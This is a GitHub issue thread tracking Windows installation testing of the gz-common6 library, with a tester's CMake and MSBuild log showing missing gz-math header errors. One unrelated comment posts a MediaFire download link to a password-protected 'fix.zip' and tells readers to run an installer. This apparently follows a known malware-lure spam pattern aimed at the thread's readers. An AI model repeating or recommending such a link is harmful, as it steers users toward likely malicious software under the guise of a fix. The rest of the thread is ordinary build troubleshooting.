gazebosim/gazebo_test_cases #1099: gz-common: Installation

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/api/common/6/install.html)
* [Source](https://github.com/gazebosim/gz-common/tree/gz-common6/tutorials/install.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Combuster54, 2024-09-13:
**Binary Install**

There's no gz-common6

**Source Install**

```sh(gz-ws) C:\Users\User\gazebo-ws\test\gz-common\build>conda install freeimage gdal gts glib dlfcn-win32 ffmpeg --channel conda-forge
(gz-ws) C:\Users\User\gazebo-ws\test\gz-common\build>cmake .. -DBUILD_TESTING=OFF
-- Selecting Windows SDK version 10.0.22621.0 to target Windows 10.0.19045.
-- gz-common6 version 6.0.0~pre2
-- Operating system is Windows
--

-- ====== Finding Dependencies ======
-- Looking for gz-math8 -- found version 8.0.0~pre1
-- Searching for dependencies of gz-math8
-- Looking for gz-utils3 -- found version 3.0.0~pre3
-- Searching for dependencies of gz-utils3
-- Looking for gz-math8 - found

-- Looking for gz-utils3 -- found version 3.0.0~pre3
-- Searching for dependencies of gz-utils3
-- Searching for <gz-utils3> component [log]
-- Looking for gz-utils3-log -- found version 3.0.0~pre3
-- Searching for dependencies of gz-utils3-log
-- Looking for gz-utils3 - found

-- Checking for module 'tinyxml2'
--   Found tinyxml2, version 10.0.0
-- Looking for tinyxml2 - found

-- Looking for FreeImage.h FreeImageconfig.h - found
-- Looking for FreeImage library - found
-- Looking for FreeImage - found

-- Looking for GDAL - found

-- Checking for module 'libswscale'
--   No package 'libswscale' found
-- Looking for libswscale - found

-- Checking for module 'libavdevice >= 56.4.100'
--   No package 'libavdevice' found
-- Looking for libavdevice - found

-- Checking for module 'libavformat'
--   No package 'libavformat' found
-- Looking for libavformat - found

-- Checking for module 'libavcodec'
--   No package 'libavcodec' found
-- Looking for libavcodec - found

-- Checking for module 'libavutil'
--   No package 'libavutil' found
-- Looking for libavutil - found

-- Looking for assimp - found

-- -------------------------------------------

-- Configuring library: gz-common6
-- Testing is disabled -- skipping UNIT tests
-- Configuring library: gz-common6-av
-- Testing is disabled -- skipping UNIT tests
-- Configuring library: gz-common6-events
-- Testing is disabled -- skipping UNIT tests
-- Configuring library: gz-common6-graphics
-- Testing is disabled -- skipping UNIT tests
-- Configuring library: gz-common6-geospatial
[... 103 lines cut ...]
C:\Users\User\gazebo-ws\test\gz-common\graphics\include\gz\common\NodeAnimation.hh(23,10): error C1083: Cannot open include file: 'gz
/math/Matrix4.hh': No such file or directory [C:\Users\User\gazebo-ws\test\gz-common\build\graphics\src\gz-common6-graphics.vcxproj]
  (compiling source file '../../../graphics/src/SkeletonAnimation.cc')

  Compiling...
  SkeletonNode.cc
C:\Users\User\gazebo-ws\test\gz-common\graphics\include\gz\common\NodeTransform.hh(22,10): error C1083: Cannot open include file: 'gz
/math/Matrix4.hh': No such file or directory [C:\Users\User\gazebo-ws\test\gz-common\build\graphics\src\gz-common6-graphics.vcxproj]
  (compiling source file '../../../graphics/src/SkeletonNode.cc')

  SubMesh.cc
C:\Users\User\gazebo-ws\test\gz-common\graphics\src\SubMesh.cc(24,10): error C1083: Cannot open include file: 'gz/math/Helpers.hh': N
o such file or directory [C:\Users\User\gazebo-ws\test\gz-common\build\graphics\src\gz-common6-graphics.vcxproj]
  CSVStreams.obj : MSIL .netmodule or module compiled with /GL found; restarting link with /LTCG; add /LTCG to the link command line
  to improve linker performance
     Creating library C:/Users/User/gazebo-ws/test/gz-common/build/lib/Release/gz-common6-io.lib and object C:/Users/User/gazebo-ws/t
  est/gz-common/build/lib/Release/gz-common6-io.exp
  Generating code
  Finished generating code
  gz-common6-io.vcxproj -> C:\Users\User\gazebo-ws\test\gz-common\build\bin\Release\gz-common6-io.dll
  gz-common6-profiler.vcxproj -> C:\Users\User\gazebo-ws\test\gz-common\build\bin\Release\gz-common6-profiler.dll
  gz-common6-testing.vcxproj -> C:\Users\User\gazebo-ws\test\gz-common\build\bin\Release\gz-common6-testing.dll

(gz-ws) C:\Users\User\gazebo-ws\test\gz-common\build>
```

closed 2024-09-13 by azeey